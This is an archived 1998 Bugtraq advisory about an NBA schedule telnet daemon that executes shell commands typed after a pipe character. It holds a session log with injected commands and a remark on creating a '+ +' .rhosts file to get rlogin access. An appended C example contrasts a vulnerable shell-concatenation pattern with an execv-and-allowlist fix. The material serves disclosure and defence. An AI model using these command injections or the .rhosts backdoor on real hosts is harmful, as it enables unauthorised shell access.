[8000] in bugtraq
NBA 4.9 Allows Shell Access
daemon@ATHENA.MIT.EDU (HD Moore)
Mon Sep 21 13:29:43 1998
Date: Sun, 20 Sep 1998 19:23:06 -0500
Reply-To: HD Moore <hdmoore@USA.NET>
From: HD Moore <hdmoore@USA.NET>
To: BUGTRAQ@NETSPACE.ORG
Recently, while browsing the internet, I came upon a link to telnet to a host on
port 859, apparently an NBA (National Basketball Association) telnet
daemon for showing game schedules. While I am not sure who wrote it, or
who uses it, it does create a major security hole on the machine it is
running on. At login, you receive a prompt that looks like <nba>; if you
type anything, then the 'pipe' character "|" followed by a shell command,
that command is executed. Doing this you could create a .rhosts file
containing the classic "+ +", thereby giving shell access through rlogin.
It is also possible to start lynx (or some other program), then break
out into a shell from that program. If anyone knows the origin of this
program, or someone who uses it, please alert them to this fact. Please
no flames concerning how stupid of a bug this is, it is still a bug =)
Below is a cut from a session log:
usage: /usr/local/bin/nba [-vh] [-nNUM] [-HA] [-C] [-E[d|w]] [-U[d|w]] [TEAM|DIV [TEAM|DIV]] [mm/dd...]
With -v, print version information and exit.
This is version 4.9 for NBA 95-96.
With -h, print this help message and exit.
With no teams or divisions specified, print next NUM days (default=1)
of league schedule from given date(s) (default is today if none given).
With one team or division, print next NUM games (default=3) for that team
or teams in that division.
With two teams or divisions, print games where first team (or team
in first division) plays second team (or team in second division).
-H or -A: Print only home or away games, for first team or division.
-C: Print monthly calendar format (specify month or default is current).
-E: Use European dates (dd/mm) and weeks (starting on Monday).
-U: Use U.S. dates (mm/dd) and weeks (starting on Sunday).
Teams can specified with or without leading -t, from the following list:
atl - Atlanta bos - Boston cha - Charlotte
chi - Chicago cle - Cleveland dal - Dallas
den - Denver det - Detroit gol - Golden State
hou - Houston ind - Indiana lac - LA Clippers
lal - LA Lakers mia - Miami mil - Milwaukee
min - Minnesota nj - New Jersey ny - New York
orl - Orlando phi - Philadelphia pho - Phoenix
por - Portland sac - Sacramento san - San Antonio
sea - Seattle tor - Toronto uta - Utah
van - Vancouver was - Washington
Divisions can specified with or without a leading -d, from the following list:
pac - Pacific mid - Midwest ctl - Central atc - Atlantic
The season runs from 11/3 to 4/21.
<nba> -V | w
/usr/local/bin/nba: unknown team or division code: -V
18:00 up 18 days, 14:14, 3 users, load average: 0.29, 0.96, 0.94
User tty from login@ idle JCPU PCPU what
xxxxxx p6 lichen 13:17 3days -ksh
xxxxxx p0 zlin 14:25 5days -tcsh
xxxxxx p7 petrie 15:13 2days 24:46 14 -csh
<nba> blah | lynx
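The session above shows the classic shape of a shell command injection: the prompt line is glued onto a command string and handed to a shell, so "|" ends the nba invocation and starts a second one. The following C program is an added example written for this page; it is not the NBA daemon's own source (which the post says is unknown) and not HD Moore's code. It models the front end two ways: build_shell_command() returns the string a system()/popen()-style wrapper would pass to sh -c, and tokenize_for_exec()/run_nba() show the fix, splitting the line into an argv, refusing any token outside an allowlist of characters the usage banner actually needs, and starting the program with execv so no shell is ever involved. The binary path comes from the banner in the post; the allowlist, the function names and the assumption that the original used a shell are mine.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

#define NBA_PATH "/usr/local/bin/nba"   /* path shown in the usage banner */
#define MAX_ARGS 16                      /* assumed limit for this example */

/* Vulnerable pattern (assumed model of the original daemon): concatenate
 * the prompt line into one command string for sh -c. The returned string
 * is exactly what system()/popen() would execute, so "-V | w" becomes
 * "/usr/local/bin/nba -V | w" and w runs as the daemon's user.
 * Caller frees the result. Nothing is executed here. */
char *build_shell_command(const char *line)
{
    size_t n = strlen(NBA_PATH) + 1 + strlen(line) + 1;
    char *cmd = malloc(n);
    if (cmd == NULL)
        return NULL;
    snprintf(cmd, n, "%s %s", NBA_PATH, line);
    return cmd;
}

/* Hardened pattern, step 1: split on whitespace into an argv and accept
 * only characters the nba usage needs (team/division codes, -flags,
 * mm/dd dates). Returns argc, or -1 if a token contains anything else
 * or there are too many tokens. argv[0] is NBA_PATH, argv is
 * NULL-terminated, tokens point into buf (modified in place). */
int tokenize_for_exec(char *buf, char *argv[], int max_args)
{
    static const char allowed[] =
        "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-/";
    int argc = 0;
    char *save = NULL;
    char *tok;

    argv[argc++] = NBA_PATH;
    for (tok = strtok_r(buf, " \t\r\n", &save); tok != NULL;
         tok = strtok_r(NULL, " \t\r\n", &save)) {
        if (argc >= max_args - 1)
            return -1;                   /* no room for the NULL terminator */
        if (strspn(tok, allowed) != strlen(tok))
            return -1;                   /* rejects '|', ';', '`', '$', quotes, ... */
        argv[argc++] = tok;
    }
    argv[argc] = NULL;
    return argc;
}

/* Hardened pattern, step 2: fork and execv the argv directly. Without a
 * shell, metacharacters could only reach nba as literal arguments, and
 * tokenize_for_exec has already refused those. Returns the child's exit
 * status, or -1 if the line was rejected or the child could not be run. */
int run_nba(const char *line)
{
    char buf[256];
    char *argv[MAX_ARGS];
    pid_t pid;
    int status;

    if (strlen(line) >= sizeof buf)
        return -1;
    strcpy(buf, line);
    if (tokenize_for_exec(buf, argv, MAX_ARGS) < 0)
        return -1;                       /* rejected before any exec */

    pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execv(argv[0], argv);
        _exit(127);                      /* exec failed in the child */
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    const char *hostile = "-V | w";      /* the line from the session log */
    char *cmd = build_shell_command(hostile);

    printf("a system() wrapper would have run: %s\n", cmd);
    free(cmd);
    printf("run_nba(\"%s\") -> %d\n", hostile, run_nba(hostile));
    printf("run_nba(\"blah | lynx\") -> %d\n", run_nba("blah | lynx"));
    printf("run_nba(\"-n3 lal bos\") -> %d\n", run_nba("-n3 lal bos"));
    return 0;
}
```

Note that the allowlist approach also neutralises the second trick in the post: "blah | lynx" never reaches a shell, so lynx is never started and there is nothing to break out of. The remaining exposure is whatever nba itself does with its arguments, which is exactly the surface a schedule daemon should be limited to.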